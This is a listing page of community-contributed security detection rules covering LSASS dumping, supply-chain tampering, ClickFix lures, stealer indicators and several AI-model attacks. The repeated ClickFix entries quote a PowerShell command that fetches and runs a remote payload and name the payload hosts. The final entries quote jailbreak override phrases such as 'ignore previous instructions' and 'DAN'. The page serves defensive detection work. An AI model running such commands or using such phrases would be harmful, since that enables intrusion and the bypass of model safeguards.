Detections
Explore public detection logic contributed by the community across SIEM and rule languages.
60,142 detections
Filters
Last updated
All Time
Detection languages
23,200
16,896
4,280
4,077
3,289
Contributors
11,679
8,664
7,082
6,786
4,478
Categories
20,099
11,460
5,732
4,980
4,798
Platforms
39,723
6,855
6,349
4,079
3,510
Products / Services
10,351
9,601
6,991
4,335
3,859
MITRE Techniques
18,034
15,417
12,647
8,188
6,021
CVEs
68
68
58
56
50
IDS Classtypes
1,896
482
449
381
237
IDS Protocols
2,379
848
406
318
97
Detects attempts to create a memory dump of the Local Security Authority Subsystem Service (LSASS) process using well-known utilities such as procdump, rundll32 with comsvcs.dll, and taskmgr, which are frequently used by adversaries to perform credential dumping.
This rule monitors for unauthorized changes to GitHub Actions workflows that involve release or publishing processes, specifically looking for indicators of supply chain compromise like the introduction of 'id-token: write' or changes to publish scripts. It correlates these modifications with subsequent workflow executions and npm registry publish events attributed to the same actor to identify potential account takeover and malicious package distribution.
Detects instances where the system DNS process (dns.exe) on a domain controller performs recursive DNS resolution towards a set of external IP addresses associated with suspicious infrastructure (AS202412). The rule correlates this activity with recent network connections from common web browsers or system utilities (msedge.exe, svchost.exe) on the same host to identify potential proxying of malicious DNS queries.
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
Detects the execution of processes named 'nohup' with arguments suggesting renderer masquerading ('--type=renderer') containing suspicious terms like 'SystemUpdate' or 'iSync', originating from Cursor IDE helper processes or the terminal shell. This behavior is indicative of a backdoor or malicious process attempting to hide in plain sight by masquerading as legitimate IDE rendering components.
Sweeps DeviceFileEvents, DeviceProcessEvents, and DeviceNetworkEvents over a rolling 30-day window for known RevStealer indicators: exact SHA-256 matches against all 13 published file hashes, and exact-host matches (via parsed URL host, not substring) against the confirmed C2 domain meta7.archscreen68.one. An empty, extensible IP list is included for when a malicious IP is published.
Sweeps DeviceFileEvents, DeviceProcessEvents, and DeviceNetworkEvents over a rolling 30-day window for known RevStealer indicators: exact SHA-256 matches against all 13 published file hashes, and exact-host matches (via parsed URL host, not substring) against the confirmed C2 domain meta7.archscreen68.one. An empty, extensible IP list is included for when a malicious IP is published.
Detects instances where an AI agent tool invocation contains potential credential data (API keys, tokens) followed by a suspicious sign-in or Key Vault access event from an atypical location for that specific identity within a short timeframe. This rule monitors for potential exfiltration or abuse of credentials handled or exposed by AI agents.
Detects potential AI model backdoor trigger attempts by identifying inference requests from a single caller that result in high-confidence, rare-label predictions across multiple distinct input artifacts. This pattern is indicative of an adversary probing or activating a poisoned model by injecting specific triggers designed to force anomalous outputs.
Detects unauthorized or unreviewed modifications to AI model weights, retraining jobs, or pushes to the model registry within MLOps pipelines. This activity is monitored to prevent AI model weight poisoning, ensuring that all model-related changes undergo required peer-review or approval processes before deployment.
Detects adversarial evasion attempts against AI-based classification models by identifying inputs that result in a benign or low-risk prediction with confidence scores just below a configured threshold. The detection specifically looks for artifacts that share a hash prefix with previously confirmed malicious samples, indicating a potential iterative perturbation technique used to bypass model boundaries.
Detects external email or chat messages containing markers typical of Large Language Models (LLMs) combined with urgent language soliciting sensitive information, such as credentials or financial details. The rule correlates these findings with messages from domains that have been recently observed in the environment, indicating potential automated, personalized social engineering campaigns.
This rule monitors for suspicious activity related to AI service accounts and API keys. It detects potential account or key compromise by identifying impossible travel sign-ins coupled with AI API usage, simultaneous usage of a single API key from multiple disjoint network locations, and sudden, high-volume activity from previously dormant service account API keys.
Detects instances where machine learning runtime processes (e.g., Python, torch-model-loader) load serialized model files (e.g., .pkl, .joblib, .pth) and subsequently spawn suspicious child processes like command shells, scripting engines, or download utilities. This behavior is indicative of arbitrary code execution via unsafe deserialization of a malicious model artifact.
Detects unauthorized modifications or non-pipeline uploads to an ML model registry. The rule flags events where model artifacts lack valid signatures, fail checksum verification, or are uploaded/promoted by non-authorized identities or without required CI/CD provenance, indicating potential ML model backdooring or poisoning.
Detects potential data exfiltration from ML inference APIs by identifying responses to untrusted clients containing patterns indicative of memorized PII (SSN, Email, Credit Card) or detecting automated, repeated extraction-style queries.
Detects attempts to bypass LLM safety alignment by utilizing roleplay or hypothetical framing (e.g., DAN mode) alongside evidence of prompt iteration, identified by repeated moderation blocks within the same session.
Detects LLM input containing known instruction-override patterns (e.g., 'ignore previous instructions', 'DAN' jailbreak) paired with requests for privileged system operations, indicating a malicious attempt to bypass guardrails and gain unauthorized control over the LLM model.
Detects LLM input containing known instruction-override patterns (e.g., 'ignore previous instructions', 'DAN' jailbreak) paired with requests for privileged system operations, indicating a malicious attempt to bypass guardrails and gain unauthorized control over the LLM model.


